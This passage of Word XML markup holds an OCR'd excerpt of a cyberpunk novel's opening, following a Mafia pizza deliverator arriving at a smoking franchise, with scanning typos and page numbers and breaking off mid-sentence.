          </w:p>
          <w:p w14:paraId="18926F08" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was a corporal in the Farms of Merryvale State Security Force for a while once. Cot himself fired for pulling a sword on an acknowledged perp. Slid it right through the fabric of the perp's shirt, gliding the flat of the blade along the base of his neck, and pinned him to a warped and bubbled expanse of vinyl siding on the wall of the house that the perp was trying to break into. Thought it was a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pretty righteous</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bust. But they fired him anyway because the perp turned out to be the son of the vice-chancellor of the Farms of Merryvale. Oh, the weasels had an excuse: said that a thirty-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>six.inch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> samurai sword was not on their Weapons Protocol. Said that he had violated the SPAC, the Suspected </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Perpetrator Apprehension Code. Said that the perp had suffered psychological trauma. He was afraid of butter knives now; he had to spread his jelly with the back of a teaspoon. They said that he </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bad</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> exposed them to liability.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BA3D6E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> had to borrow some money to pay for it. Had to borrow it from the Mafia, in fact. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> he's in their database now-retinal patterns, DNA, voice graph, fingerprints, footprints, palm prints, wrist prints, every flicking part of the body that had wrinkles on it-almost-those bastards rolled in ink and made a print and digitized it into their computer. But it's their money-sure they're careful about loaning it out. And when he applied for the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> job they were happy to take him, because they knew him. When he got the loan, he had to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>deal</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="37D36F4A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45614AEA" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>personally</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> with the assistant vice-capo of the Valley, who later recommended him for the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> job. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>So</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> it was like being in a family. A </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>really scary</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, twisted, abusive family.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4083D577" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza #3569 is on Vista Road just down from Kings Park Mall. Vista Road used to belong to the State of California and now is called Fairlanes, Inc. Rte. CSV-5. Its main competition used to be a U.S. highway and is now called Cruise- ways, Inc Rte. Cal-12. Farther up the Valley, the two competing highways </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>actually cross</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. Once there had been bitter disputes, the intersection closed by sporadic sniper fire. Finally, a big developer bought the entire intersection and turned it into a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>drive~through</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> mall. Now the roads just feed into a parking system-not a lot, not a ramp, but a system-and lose their identity. Getting through the intersection involves tracing paths through the parking system, many braided filaments of direction like the Ho Chi Minh trail. CSV-5 has better throughput, but Cal.12 has better pavement. That is typical-Fairlanes roads emphasize getting you there, for Type A drivers, and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cruiseways</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> emphasize the enjoyment of the ride, for Type B drivers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CA103A2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is a Type A driver with rabies. He is zeroing in on his home base, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza #3569, cranking up the left lane of CSV-5 at a hundred and twenty kilometers. His car is an invisible black lozenge, just a dark place that reflects the bin-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of franchise signs-the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loglo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. A row of orange lights </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>burbies</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and churns across the front, where the grille would be if this were an air-breathing car. The orange light looks like a gasoline fire. It comes in through people's rear windows, bounces off their rearview mirrors, projects a fiery mask across their eyes, reaches into their subconscious, and unearths terrible fears of being pinned, fully conscious, under a detonating gas tank, makes them want to pull over and let the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> overtake them in his black chariot of pepperoni fire.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681529AD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loglo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, overhead, marking out CSV-5 in twin contrails, is a body of electrical light made of innumerable cells, each cell designed in Manhattan by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>imageers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> who make more for designing a single logo than a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> will make in his entire lifetime. Despite their efforts to stand out, they all smear together, especially at a hundred and twenty kilometers per hour. Still, it is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>easy</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0EECCB29" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3A9A4B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">to see </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza #3569 because of the billboard, which is wide and tall even by current inflated standards. In fact, the squat franchise itself looks like nothing more than a low-slung base for the great aramid fiber pillars that thrust the billboard up into the trademark firmament. Marca </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Registrada</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, baby.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3E0424" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The billboard is a classic, a chestnut, not a figment of some fleeting Mafia promotional campaign. It is a statement, a monument built to endure. Simple and dignified. It shows Uncle Enzo in one of his spiffy Italian suits. The pinstripes glint and flex like sinews. The pocket square is luminous. His hair is perfect, slicked back with something that never comes off, each strand cut off </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>st.raight</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and square at the end by Uncle Enzo's cousin, Art the Barber, who runs the second-largest chain of low-end haircutting establishments in the world. Uncle Enzo is standing there, not exactly smiling, an avuncular glint in his eye for sure, not posing like a model but standing there like your uncle would, and it </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>says</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3231AB33" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3681A05D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>The Mafia</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F1EBA6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>you've got a friend in The Family!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CEA0D4E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>paid for by the Our Thing Foundation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A0D468C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A584132" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26CA214A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bifiboard</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> serves as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> polestar. He knows that when he gets to the place on CSV-5 where the bottom corner of the billboard is obscured by the pseudo-Gothic stained-glass arches of the local Reverend Wayne's Pearly Gates franchise, it's time for him to get over into the right lanes where the retards and the bimbo boxes poke along, random, indecisive, looking at each passing franchise's driveway like they don't know if it's a promise or a threat.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336BCCC1" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He cuts off a bimbo box-a family minivan-veers past the Buy 'n' Fly that is next </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>door, and</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pulls into </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza #3569. Those big fat contact patches complain, squeal a little bit, but they hold on to the patented Fairlanes, Inc. high-traction pavement and guide him into the chute. No other </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverators</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> are waiting in the chute. That is good, that means high turnover for him, fast action, keep moving that 'za. As he scrunches to a stop, the electromechanical hatch on the flank of his car is already opening to reveal his empty pizza slots, the door </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>clicking</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="499ADCC8" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5514C83C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>and folding back in on itself like the wing of a beetle. The slots are waiting. Waiting for hot pizza.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19528F00" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">And waiting. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> honks his horn. This is not a nominal outcome.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F44A761" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Window slides open. That should never happen. You can look at the three-ring binder from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza University, cross-reference the citation for window, chute, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>dispatcher's</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, and it will give you all the procedures for that window-and it should never be opened. Unless something has gone wrong.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D5E670" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The window slides open and-you sitting </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>down?-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">smoke comes out of it. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> hears a discordant beetling over the metal hurricane of his sound system and realizes that it is a smoke alarm, coming from inside the franchise.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F64B5A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mute button on the stereo. Oppressive silence-his eardrums </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uncringe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-the window is buzzing with the cry of the smoke alarm. The car idles, waiting. The hatch has been open too long, atmospheric pollutants are congealing on the electrical contacts in the back of the pizza slots, he'll have to clean them ahead of schedule, everything is going exactly the way it shouldn't go in the three-ring binder that spells out all the rhythms of the pizza universe.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB58E6A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inside, a football-shaped Abkhazian man is running to and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fro</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, holding a three-ring binder open, using his spare tire as a ledge to keep it from collapsing shut; he runs with the gait of a man carrying an egg on a spoon. He is shouting in the Abkhazian dialect; all the people who run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pizza franchises in this part of the Valley are Abkhazian immigrants.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022566BB" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">It does not look like a serious fire. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> saw a real fire once, at the Farms of Men-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>yvale</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, and you couldn't see anything for the smoke. That's all it was: smoke, burbling out of nowhere, occasional flashes of orange light down at the bottom, like heat lightning in tall clouds. This is not that kind of fire. It is the kind of fire that just barely puts out enough smoke to detonate the smoke alarms. And he is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>losing</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> time for </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>this !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE2CED3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> holds the horn button down. The Abkhazian manager comes to the window. He is supposed to use the intercom to talk to drivers, he could say anything he </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>wanted</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and it would be piped straight into the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car, but no, he has</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B256C03" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">to talk face to face, like the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is some kind </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>of !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ing ox cart driver. He is red-faced, sweating, his eyes roll as he tries to think of the English words.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15ADAD7F" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>4dA fire, a little one," he says.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E5A519" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> says nothing. Because he knows that all of this is going onto videotape. The tape is being pipelined, as it happens, to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza University, where it will be </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arialyzed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> in a pizza management science laboratory. It will be shown to Pizza University students, perhaps to the very students who will replace this man when he gets fired, as a textbook example of how to screw up your life.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EFB8040" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>"New employee-put his dinner in the microwave-had foil in it-boom!" the manager says.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11742518" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abkhazia had been part of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Soviet !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing Union. A new immigrant from Abkhazia trying to operate a microwave was like a deep-sea tube worm doing brain surgery. Where did they get these guys? Weren't there any Americans who could bake </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ing pizza?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBFB75A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">"Just give me one pie," the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> says.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E9C2EC" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Talldng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> about pies snaps the guy into the current century. He gets a grip. He slams the window shut, strangling the relentless keening of the smoke alarm.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE7BFA8" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>A Nipponese robot arm shoves the pizza out and into the top slot. The hatch folds shut to protect it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B08DC3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">As the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
